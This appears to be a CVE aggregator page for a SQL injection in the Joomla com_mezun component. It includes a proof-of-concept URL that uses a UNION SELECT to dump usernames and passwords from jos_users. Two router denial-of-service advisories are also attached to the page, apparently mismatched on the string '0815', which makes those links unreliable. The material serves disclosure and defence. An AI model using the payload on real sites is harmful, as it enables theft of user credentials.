CVE-2008-0815
published 2008-02-19CVE-2008-0815: SQL injection vulnerability in the com_mezun component for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in an edit…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.96%
57.1th percentile
SQL injection vulnerability in the com_mezun component for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in an edit task.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Gigaset SE461 WiMAX Router - Remote Denial of Service
exploitdb·2009-03-23
CVE-2009-1152 Gigaset SE461 WiMAX Router - Remote Denial of Service
Gigaset SE461 WiMAX Router - Remote Denial of Service
---
_ _ _____ _ ___ _____ _ _
/ / / / ____/ / / _/_ __/ / / /
/ /_/ / __/ / / / / / / / /_/ /
/ __ / /___/ /____/ / / / / __ /
/_/ /_/_____/_____/___/ /_/ /_/ /_/
Helith - 0815
Author : Benkei
Date : 2008-02-08
Vendor : Siemens
Affected product : Gigaset SE461 WiMAX router
Firmware version : 1.5-BL024.9.6401
Propably other firmware versions are affected as well
Type : Denial of Service
OSVDB :
Milw0rm :
CVE :
ISS X-Force: :
After establishing a tcp connection to the affected device on port 53 from the
LAN interface and after closing the connection the router will restart.
Sometimes when using the web trigger with Internet explorer the WAN
configuration (ip, gateway ip, dns servers) for the device was lost and a
hardware reset was
Exploit-DB
Netgear SSL312 Router - Denial of Service
exploitdb·2009-02-09
CVE-2009-0680 Netgear SSL312 Router - Denial of Service
Netgear SSL312 Router - Denial of Service
---
_ _ _____ _ ___ _____ _ _
/ / / / ____/ / / _/_ __/ / / /
/ /_/ / __/ / / / / / / / /_/ /
/ __ / /___/ /____/ / / / / __ /
/_/ /_/_____/_____/___/ /_/ /_/ /_/
Helith - 0815
Author : Rembrandt
Date : 2008-02-27
Affected Software: propietary CGI
Affected OS : Netgear embedded Linux for the SSL312 router
Propably other devices are affected as well
Type : Denial of Service
OSVDB :
Milw0rm : 8008
CVE :
ISS X-Force: :
BID : 33675
Trying to fix it responsible and get in contact with the vendor:
-- ZDI --
Case Opened 2008-12-28 07:57 GMT-6
Case Closed 2009-01-15 17:01 GMT-6
"After some deliberation we have unfortunately decided that we won't be
accepting bugs affecting NetGear products."
-- END --
Contacting Netgear and mitre.org: 2009-02-01 1
Exploit-DB
okul siteleri 'com_mezun' Component - SQL Injection
exploitdb·2008-02-12
CVE-2008-0815 okul siteleri 'com_mezun' Component - SQL Injection
okul siteleri 'com_mezun' Component - SQL Injection
---
source: https://www.securityfocus.com/bid/27755/info
'okul siteleri' is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://ww.example.com/index.php?option=com_mezun&task=edit&hidemainmenu=S@BUN&id=-9999999/**/union/**/select/**/concat(username,0x3a,password),username,password,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a/**/from/**/jos_users/*
No writeups or analysis indexed.
http://securityreason.com/securityalert/3663http://www.securityfocus.com/archive/1/487992/100/100/threadedhttp://www.securityfocus.com/bid/27755https://exchange.xforce.ibmcloud.com/vulnerabilities/40448http://securityreason.com/securityalert/3663http://www.securityfocus.com/archive/1/487992/100/100/threadedhttp://www.securityfocus.com/bid/27755https://exchange.xforce.ibmcloud.com/vulnerabilities/40448
2008-02-19
Published